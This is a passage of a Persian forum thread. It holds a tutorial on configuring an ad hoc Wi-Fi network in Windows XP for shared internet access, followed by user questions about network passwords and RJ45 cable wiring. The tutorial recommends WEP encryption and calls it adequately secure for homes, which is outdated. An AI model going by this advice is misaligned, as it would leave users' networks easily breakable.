l رمزگذاري روي اطلاعات در روش ad hoc نسبت به روش روتر خيلي ضعيف‌تر است و در نتيجه هکرهاي حرفه‌اي در زمان کوتاه‌تري مي‌توانند رمز شبکه را بدست بياورند. ( البته براي کاربران خانگي که بيشتر نگران استفاده همسايگانشان از سيگنال هاي بي‌سيم آنها هستند، به اندازه کافي ايمن مي‌باشد. ) بنابراين اين روش براي افرادي که اطلاعات محرمانه را انتقال مي‌دهند، به هيچ وجه توصيه نمي‌شود و تنها راه آنها خريد يک دستگاه روتر مي‌باشد.

l سرعت شبکه شما به 11 Mbps محدود مي‌شود. حتي اگر از كارت‌هاي با سرعت 54 Mbps هم استفاده کنيد، باز به خاطر ماهيت اين پروتکل، سرعت شما به 11 Mbps کاهش مي‌يابد.

حتي اگر شما داراي يک روتر با پهناي باند بالا بدون قابليت بي‌سيم باشيد، باز هم مي‌توانيد يک شبکه ad hoc را پيکربندي کنيد. اگر شبکه شما داراي اين ويژگي باشد، بنابراين نقطه ضعف دوم از موارد ذکر شده بالا، حل خواهد شد. هرچند سه مورد ديگر همچنان پابرجاست. همچنين يک مورد مهم ديگر در اين نوع شبكه‌ها وجود دارد و آن عبارتست از اينکه شما مجبوريد که محدوده آيپي آدرس شبکه را درصورتي که در محدوده 192.168.0.X پيکربندي شده باشد، تغيير دهيد و از محدوده 192.168.1.X به جاي آن استفاده کنيد، زيرا " سرويس اشتراک اينترنت ويندوز " هم از محدوده 192.168.0.X استفاده مي‌کند و شما با تداخل آيپي آدرس‌هاي شبکه مواجه خواهيد شد. اين پيکربندي معمولاً با اجراي برنامه روتر انجام مي‌شود. ( اغلب با بازکردن IE و تايپ http://192.168.0.1 در خط آدرس آن، از هر کامپيوتر دلخواهي که به روتر متصل مي‌باشد، انجام مي‌شود. )

كارت‌هاي شبکه بي‌سيم
همانگونه که قبلاً اشاره شد، براي هر دستگاهي که مي‌خواهيد به شبکه بي‌سيم متصل باشد، نياز به خريد يک کارت شبکه بي‌سيم داريد. كارت‌هاي شبکه بي‌سيم با حداقل يکي از پروتکل‌هاي IEEE 802.11 تطابق دارند. چندين پروتکل وجود دارد که رايج ترين آنها 802.11a ، 802.11b و 802.11g مي‌باشند.
از اين به بعد و براي سهولت، در اين مقاله به آنها به صورت a ، b و g اشاره مي‌کنم. تفاوت اصلي آنها در سرعت و فرکانس مي‌باشد. حداکثر سرعت b حدود 11 Mbps مي‌باشد و حداکثر سرعت a و g در حدود 54 Mbpsاست. ( تفاوت a وg هم در فرکانس کاري آنها مي‌باشد. ) نسل بعدي اين پروتکل ها 802.11n مي‌باشد که داراي حداکثر سرعت 540 Mbps مي‌باشد.

جدول 1: مقايسه انواع استانداردهاي شبكه‌هاي بي‌سيم

بعضي از كارت‌هاي شبکه بي‌سيم با سرعت 108 Mbps معرفي مي‌شوند، اما در حقيقت آنها داراي سرعت 54 Mbps مي‌باشند که توسط تکنيک هايي مثل فشرده سازي اطلاعات به اين سرعت مي‌رسند. براي بهره بردن از اين قابليت بايد کليه تجهيزات بي‌سيم شبکه ( روتر و کليه كارت‌هاي شبکه بي‌سيم ) از يک سازنده باشند و در غير اينصورت باز از همان سرعت پروتکل هاي عادي a ، b و g استفاده خواهيد کرد. متاسفانه اين قابليت هم در شبكه‌هاي ad-hoc کار نمي‌کند. پس باز هم به سرعت 11 Mbps قناعت پيشه کنيد!
در تئوري بهترين حالت اين است که تمام کامپيوترها مجهز به كارت‌هاي شبکه بي‌سيم 54 Mbps ( يا 108 Mbps ) باشند. هرچند سرعت شما به سرعت اتصال به اينترنت‌تان محدود مي‌شود. بنابراين اگر از شبکه شما براي انتقال فايل بين کامپيوترها استفاده نمي‌شود، خريد كارت‌هاي شبکه 54 Mbps هيچ کمکي به سرعت شما نمي‌کند چرا که سرعت اتصال به اينترنت شما بسيار پايين‌تر از اين مي‌باشد. براي مثال، اگر شما داراي يک اتصال 1 Mbps براي اينترنت مي‌باشيد، با داشتن كارت‌هاي 54 Mbps، داراي شبکه‌اي مي‌باشيد که قادر است اطلاعات را 54 بار سريعتر از اتصال اينترنت شما انتقال دهد. يک شبکه 11 Mbps با توجه به هزينه پايين تر، بهتر عمل خواهد کرد. ( هرچند آن هم 11 بار سريعتر از اتصال اينترنت شما خواهد بود ) بنابراين با خريد كارت‌هاي 11 Mbps ، در هزينه صرفه جويي خواهد شد.
نکته مهمتر براي ما در اين مقاله آن است که شبكه‌هاي ad-hoc قادر به انتقال اطلاعات با سرعت بالاي 11 Mbps نمي‌باشند، بنابراين خريد كارت‌هاي 54 Mbps براي اينگونه شبكه‌ها، در واقع دور ريختن پول است! اگر شما واقعاً نياز به سرعت 54 Mbps و يا 108 Mbps براي انتقال اطلاعات داريد، چاره‌اي جز خريد روتر و را‌ه‌اندازي شبکه براساس روتر نداريد.
پس اگر شما داراي يک اتصال اينترنت 1 Mbps يا حتي 2 Mbps باشيد، با داشتن كارت‌هاي 11 Mbps يا 54 Mbps يا 108 Mbps ، سرعت اينترنت شما از 1 Mbps يا 2 Mbps بالاتر نخواهد رفت.
اگر با وجود توصيه‌هاي فوق، باز هم تمايل به خريد كارت‌هاي 54 Mbps داريد، حداقل مطمئن باشيد کارتي که مي‌خريد با استاندارد 802.11b مطابقت داشته باشد ( يعني 802.11g باشد و نه 802.11a ) چرا که با آن مي‌توانيد شبکه بي‌سيم خود را بدون استفاده از روتر بسازيد، زيرا شبكه‌هاي ad-hoc فقط در 11 Mbps کار مي‌کنند. نکته مهم بعدي اين است که تمام كارت‌هاي 54 Mbps خريداري شده داراي يک استاندارد ( همه a يا همه g ) باشند، چرا که اگر در آينده قصد ارتقاء شبکه بي‌سيم خود را داشتيد و اقدام به خريد يک روتر کرديد، همه دستگاهها قادر به انتقال اطلاعات با سرعت 54 Mbps باشند.

انواع كارت شبكه بي‌سيم
دو نوع کارت شبکه بي‌سيم وجود دارد: USB و add on .
معمولاً كارت‌هاي add-on پايدارتر مي‌باشند. كارت‌هاي add on براي کامپيوترهاي روميزي مطابق با اسلات PCI ( و معمولاً مطابق با استاندارد PCI-Express X1 ) و براي نوت بوك‌ها مطابق با PC Card و يا Express Card توليد مي‌شوند. اگر نوت بوکتان داراي کارت شبکه بي‌سيم نمي‌باشد، بايد مطمئن شويد که داراي اسلات توسعه ( PC Card يا Express Card ) مي‌باشد يا نه؟ و سپس اقدام به خريد کارت مناسب با آن اسلات بکنيد.
نصب کارت شبکه طبق دستورالعمل همراه آن به سادگي انجام مي‌شود. مراحل آن معمولاً بدين ترتيب مي‌باشد: ابتدا کارت را به کامپيوترتان متصل کنيد. ( اگر يک کارت PCI را روي يک کامپيوتر روميزي نصب مي‌کنيد، ابتدا بايد دستگاه را خاموش کنيد و درب کيس را باز کنيد. ) سپس دستگاه را روشن کنيد و درايور آن را نصب کنيد.
كارت‌هاي شبکه بي‌سيم را در کامپيوترهايي که مي‌خواهيد به شبکه بي‌سيم متصل شوند، نصب کنيد. مرحله بعدي پيکربندي کامپيوتر ميزبان ( Host ) مي‌باشد که آن کامپيوتري است که به اينترنت متصل مي‌باشد. اگر شما اتصال اينترنت را با استفاده از يک روتر با پهناي باند بالا ( بدون قابليت بي‌سيم ) به اشتراک گذاشته ايد، هر کامپيوتري که به روتر متصل مي‌باشد را مي‌توانيد به عنوان ميزبان، پيکربندي کنيد. در اين حالت به خاطر داشته باشيد که همانگونه که قبلاً اشاره شد، مجبوريد که محدوده IP آدرس شبکه اتان را در صورتيکه از محدوده 192.168.0.X استفاده مي‌کند، تغيير دهيد تا از محدوده آدرس 192.168.1.X استفاده کند، چرا که سرويس اشتراک اينترنت ويندوز هم از محدوده آدرس 192.168.0.X استفاده مي‌کند و شما دچار تداخل آدرس IP خواهيد شد.

پيکربندي کامپيوتر ميزبان
حالا بايد کامپيوتر ميزبان ( همان کامپيوتري که به اينترنت وصل مي‌باشد ) را پيکربندي کرد. اگر اتصال اينترنت را با استفاده از يک روتر به اشتراک بگذاريد، هر کامپيوتري که به روتر متصل باشد، مي‌تواند به عنوان ميزبان پيکربندي شود. همانگونه که اشاره شد، نمي‌توانيد اين کامپيوتر را خاموش کنيد چرا که تمام کامپيوترهاي ديگر قادر به دسترسي به اينترنت نخواهند بود.
حالا مراحل زير را گام به گام دنبال کنيد:
1 ـ ابتدا گزينه Network Connections را از کنترل پانل باز کنيد. سپس روي گزينه Wireless Network Connection کليک راست کرده و گزينه Properties را انتخاب کنيد. ( به شکل1 دقت نماييد. )




http://upmihan.com/files/2/Portal/Ad_Hoc_01small_s.jpg







2 ـ در پنجره باز شده به برگه Wireless Networks رفته ( به شکل 2 دقت کنيد ) و مطمئن شويد که هيچ شبکه بي‌سيمي از قبل در ليست Preferred Network وجود نداشته باشد، اگر وجود داشت، آن را انتخاب کرده و سپس توسط دکمه Remove آن را حذف کنيد.




http://upmihan.com/files/2/Portal/Ad_Hoc_02_s.jpg







3 ـ سپس مطابق با شکل 3 روي دکمه Advanced کليک کرده و گزينه Computer to Computer (ad hoc) Network only را انتخاب کنيد و دکمه Close را بزنيد.







http://upmihan.com/files/2/Portal/Ad_Hoc_03_s.jpg





4 ـ حالا از پنجره Wireless Network Connection Propertiesدکمه Add را انتخاب کنيد. ( به شکل 4 دقت کنيد. ) با اين کار شبکه بي‌سيم را پيکربندي مي‌کنيم. شما بايد موارد زير را تعيين کنيد:
l نام شبکه ( Network Name SSID ) : اين بخش نام شبکه بي‌سيم شما را مشخص مي‌کند و کامپيوترها با اين نام به دنبال شبکه بي‌سيم مي‌گردند.
l اعتبار سنجي شبکه ( Network Authentication ) : آيا اعتبار کامپيوترهاي شبکه هنگام برقراري ارتباط بررسي بشود يا نه؟ براي شبكه‌هاي ad hoc مقدار آن را Open انتخاب کنيد.
l رمز گذاري داده‌ها ( Data Encryption ) : نوع سيستم رمز گذاري داده‌ها را WEP انتخاب کنيد.
l کادر " The Key is Provided for me automatically" را از حالت انتخاب خارج کنيد.
l پيکربندي کليد شبکه ( Network Key ) : کليد شبکه، يک اسم رمز مي‌باشد که براي رمز گذاري داده‌هاي انتقالي در شبکه استفاده مي‌شود. اين رمز گذاري مانع از دسترسي همسايگان به امواج شبکه بي‌سيم شما شده و از ديدن و درنتيجه حذف کردن فايل‌هاي شما توسط آنها جلوگيري مي‌کند، حتي اگر سرويس اشتراک فايلها در شبکه شما فعال باشد. البته لازم بذکر است که آنها امواج شبکه شما را توسط كارت‌هاي شبکه بي‌سيم خودشان دريافت مي‌کنند، ولي بدليل نداشتن کليد شبکه، قادر به ورود به شبکه شما نيستند. اين کليد هر ترکيبي از حروف و اعداد مي‌تواند باشد.



http://upmihan.com/files/2/Portal/Ad_Hoc_04_s.jpg



بعد از زدن دکمه OK، نام شبکه شما در بخش Preferred Network ديده مي‌شود. ( به شکل 5 دقت کنيد ) شبکه شما با يک علامت ضربدر قرمز مشخص شده است که کاملاً طبيعي است و جاي هيچ نگراني از بابت آن ضربدر قرمز نيست



http://upmihan.com/files/2/Portal/Ad_Hoc_05_s.jpg



حالا بايد اتصال اينترنت را در شبکه به اشتراک گذاشت. توجه داشته باشيد که اين عمل بر روي کارت شبکه‌اي که به کانکشن اينترنت متصل است، انجام مي‌شود و نه بر روي کارت شبکه بي‌سيم دستگاه. براي اينکار مجدداً گزينه Network Connections را از کنترل پانل باز کرده و روي کارت شبکه‌اي که به کانکشن اينترنت متصل مي‌باشد، کليک راست کرده و گزينه Properties را انتخاب کنيد. در پنجره نمايان شده، برگه Advanced را انتخاب کرده و کادر "Allow Other Network Users to Connect …" را انتخاب کرده و کادر پاييني يعني "Allow Other Network Users to Control …" را از حالت انتخاب خارج کنيد. ( به شکل 6 دقت کنيد. )



http://upmihan.com/files/2/Portal/Ad_Hoc_06_s.jpg



دکمه OK را بزنيد. حالا تحت نام کارت شبکه‌اي که به اينترنت متصل مي‌باشد، عبارت "Shared" را مي‌بينيد. ( به شکل7 دقت کنيد. ) در عين حال هنوز اتصال کارت شبکه بي‌سيم شما به صورت "Not Connected" نمايان مي‌باشد که اين امر هم کاملاً طبيعي است. تنها در صورتيکه هر کامپيوتر ديگري به شبکه شما بپيوندد، اين عبارت به "Connected" تغيير مي‌کند.



http://upmihan.com/files/2/Portal/Ad_Hoc_07small_s.jpg



حالا کامپيوتر ميزبان بدرستي پيکربندي شده است و بايد کامپيوترهاي ديگر را براي استفاده از شبکه بي‌سيم پيکربندي کرد.

پيکربندي ساير کامپيوترها
پيکربندي ساير کامپيوترها بسيار ساده مي‌باشد و کافي است که مراحل زير را دنبال کنيد:
ـ اگر کامپيوتر ميزبان را بدرستي پيکربندي کرده باشيد، شبکه بي‌سيم شما در ليست شبكه‌هاي در دسترس تمام کامپيوترهايي که داراي کارت شبکه بي‌سيم مي‌باشند، قرار مي‌گيرد. فقط کافيست که روي آيکون شبکه بي‌سيم واقع در نوار وظيفه کليک کرده و يا روي آيکون Wireless Network Connection در پنجره Network Connections در کنترل پانل دابل کليک کنيد تا ليست شبكه‌هاي بي‌سيم در دسترس را ببينيد. همانگونه که در شکل 8 مشخص شده است، امکان دارد که چندين شبکه بي‌سيم را ببينيد. ( بقيه شبكه‌ها مربوط به شبكه‌هاي بي‌سيم اطراف شما مي‌باشند و اينجاست که رمز گذاري داده‌ها اهميت پيدا مي‌کند. ) حال بايد روي شبکه خودتان ( مثلاً MyHome ) کليک کنيد.



http://upmihan.com/files/2/Portal/Ad_Hoc_08_s.jpg





بعد از دابل کليک کردن بر روي نام شبکه مورد نظر، مطابق با شکل 9 ويندوز کليد شبکه مذکور را از شما مي‌خواهد. ( همان کليدي که در مرحله 4 وارد کرديد. )



http://upmihan.com/files/2/Portal/Ad_Hoc_09small_s.jpg



بعد از وارد کردن کليد شبکه ( 2بار )، وضعيت شبکه شما به صورت "Acquiring Network Address" ظاهر مي‌شود و سپس به وضعيت "Connected" تغيير حالت مي‌دهد.



http://upmihan.com/files/2/Portal/Ad_Hoc_10_s.jpg





بعد از اين، از طريق اتصال اينترنت موجود بر روي کامپيوتر ميزبان، به اينترنت دسترسي خواهيد داشت. اگر تمام کارها را مطابق با مقاله انجام داده‌ايد مي‌توانيد صحت آنها را از طريق باز کردنIE و سر زدن به سايت www.IRtools4U.com بررسي کنيد!
حالا روي کامپيوتر ميزبان عبارت "Connected" براي ارتباط بي‌سيم ظاهر مي‌شود. ( به شکل 11 دقت نماييد. ) همانگونه که اشاره شد، تنها وقتي عبارت "Connected" در کامپيوترهاي ميزبان ظاهر مي‌شود که حداقل يکي از کاميپوترهاي ديگر به آن متصل شده باشند.



http://upmihan.com/files/2/Portal/Ad_Hoc_11_s.jpg



براي اطمينان بيشتر، پيشنهاد مي‌شود ساير شبكه‌هايي که در بخش "Preferred Networks" نمايان مي‌شوند و مربوط به شبکه همسايگان گرامي مي‌باشند را در تمام کامپيوترها حذف کنيد.
حالا که شما اينترنت را در شبکه بي‌سيم خود به اشتراک گذاشته ايد، مي‌توانيد شبکه را براي اشتراک چاپگرها و فايل‌ها هم پيکربندي کنيد. نکته مهم آن است که فايل‌ها يا چاپگرها ( برخلاف اينترنت ) نيازي نيست که بر روي کامپيوتر ميزبان قرار داشته باشند و مي‌توانند روي هر کامپيوتري که در شبکه قرار دارد، باشند. ( هرچند بهتر است که چاپگرها روي کامپيوتر ميزبان باشند، زيرا اين کامپيوتر مجبور است که به خاطر تامين اينترنت براي سايرين، هميشه روشن باشد و درنتيجه چاپگر شما هم هميشه فعال خواهد بود. )
سخن پاياني
را‌ه‌اندازي شبکه بي‌سيم به صورت ad hoc يکي از روش‌هاي پر کاربرد در منازل و دفاتر اداري کوچک مي‌باشد که با توجه به سادگي پياده سازي آن، به راحتي توسط کاربران عادي قابل انجام است. لذا در صورتيکه نياز به سرعت بالا در انتقال اطلاعات بين کامپيوترها نداريد، شک نکنيد که بهترين گزينه همين روش ad hoc مي‌باشد.

mosafer1375
13-06-2011, 17:10
ب اسلام
من توی یه شرکت کار میکنم می خوام بدونم اگه توی شبکهایی که بین کامپیوترها برقرا هست اگه پسورد ازم بخواد میشه دورش زد یا نه؟
چی جور توی شبکه میشه پسورد قرار داد طوری که هر کی خواست بیاد داخل کامپیوتر X حتما باید پسورد و یزور نیم بهش بده

ممنون میشم راهنمایی کنید

mosafer1375
14-06-2011, 17:23
باسلام
من توی یه شرکت کار میکنم می خوام بدونم اگه توی شبکهایی که بین کامپیوترها برقرا هست اگه پسورد ازم بخواد میشه دورش زد یا نه؟
چی جور توی شبکه میشه پسورد قرار داد طوری که هر کی خواست بیاد داخل کامپیوتر X حتما باید پسورد و یزور نیم بهش بده

ممنون میشم راهنمایی کنید


کسی نبود در این رابط یه راهنمایی کنه

DigiChat
05-01-2012, 12:49
Check out digichat-downloads.com

as111
05-01-2012, 18:10
یک سیم 2متری رو میخام برای شبکه کردن واستفاده در هاب سوکت بزنم ورنگ این سیمهارو بترتیب میخاستم ببینم به چه صورتی باید باشن؟؟؟
ممنونم

as111
06-01-2012, 00:13
لطفا یکی راهنمایی کنه؟؟؟؟؟؟

یک سیم 2متری رو میخام برای شبکه کردن واستفاده در هاب سوکت بزنم ورنگ این سیمهارو بترتیب میخاستم ببینم به چه صورتی باید باشن؟؟؟
ممنونم

as111
06-01-2012, 23:48
کسی نیست؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

لطفا یکی راهنمایی کنه؟؟؟؟؟؟

panda
07-01-2012, 00:06
کسی نیست؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

سلام


برای اتصال به سوئیچ هردو سر کابل به ترتیب زیر باشد:

color pin
1 White-Orange
2 Orange
3 White-Green
4 Blue
5 White-Blue
6 Green
7 White-Brown
8 Brown


RJ45 Pinout (http://pinouts.ws/rj-45-pinout.html)

as111
07-01-2012, 18:02
ممنونم .منظوردوطرف کابل وقتی ضامن به پایین باشه همین رنگها باشه یا طرف دیگر کابل رنگها برعکس باشن چون تو این قسمتی که عکس گذاشتین طرف دیگرو رنگهاش فرق کردن؟؟؟

سلام


برای اتصال به سوئیچ هردو سر کابل به ترتیب زیر باشد:

color pin
1 White-Orange
2 Orange
3 White-Green
4 Blue
5 White-Blue
6 Green
7 White-Brown
8 Brown


RJ45 Pinout (http://pinouts.ws/rj-45-pinout.html)

as111
15-01-2012, 21:49
یکی لطفا راهنمایی کنه حتما باید یه هفته بگذره؟؟؟؟؟؟؟؟؟؟؟؟

ممنونم .منظوردوطرف کابل وقتی ضامن به پایین باشه همین رنگها باشه یا طرف دیگر کابل رنگها برعکس باشن چون تو این قسمتی که عکس گذاشتین طرف دیگرو رنگهاش فرق کردن؟؟؟